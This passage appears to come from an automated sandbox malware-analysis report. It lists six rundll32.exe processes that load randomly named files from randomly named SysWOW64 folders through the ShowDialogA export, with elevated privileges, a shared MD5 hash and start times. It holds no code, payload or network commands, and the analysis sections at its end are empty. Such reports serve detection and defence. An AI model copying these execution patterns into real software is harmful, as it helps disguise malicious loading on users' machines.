                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Pvbzatsazzovzkv\hcdstjffkhswof.tvm',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:44
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ipdtn\rmgx.ktd',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:45
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Wxiibgduobebnp\hfpumnmgeezpt.jsh',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:45
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Ndsevdxfleyh\dktakeexwon.agz',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:46
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Fmtjatw\czosow.gcn',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      General

                      Start time:20:30:47
                      Start date:12/01/2021
                      Path:C:\Windows\SysWOW64\rundll32.exe
                      Wow64 process (32bit):true
                      Commandline:C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\SysWOW64\Udumexhq\tqqkqid.sqp',ShowDialogA
                      Imagebase:0x50000
                      File size:44544 bytes
                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Reputation:moderate

                      Disassembly

                      Code Analysis

                      Reset < >